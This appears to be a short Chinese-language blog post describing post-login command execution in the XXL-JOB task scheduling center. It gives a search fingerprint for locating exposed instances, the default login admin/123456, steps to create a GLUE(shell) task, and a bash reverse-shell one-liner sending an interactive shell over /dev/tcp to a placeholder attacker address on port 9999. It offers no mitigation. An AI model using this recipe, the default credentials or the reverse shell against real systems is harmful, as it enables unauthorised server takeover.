XXL-JOB 任务调度中心 后台任意命令执行漏洞
# XXL-JOB 任务调度中心 后台任意命令执行漏洞
## 漏洞描述
XXL-JOB 任务调度中心攻击者可以在后台可以通过写入shell命令任务调度获取服务器权限
## 漏洞影响
XXL-JOB
## 网络测...
XXL-JOB 任务调度中心 后台任意命令执行漏洞
漏洞描述
XXL-JOB 任务调度中心攻击者可以在后台可以通过写入shell命令任务调度获取服务器权限
漏洞影响
XXL-JOB
网络测绘
app="XXL-JOB" || title="任务调度中心"
漏洞复现
登录后台增加一个任务
默认口令 admin/123456
注意运行模式需要为 GLUE(shell)
点击 GLUE IDE编辑脚本
执行探测出网,和任务调用是否可执行反弹一个shell
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1'
- 发表于 2024-07-12 18:47:49
- 阅读 ( 2406 )
- 分类:Web应用
带头大哥
456 篇文章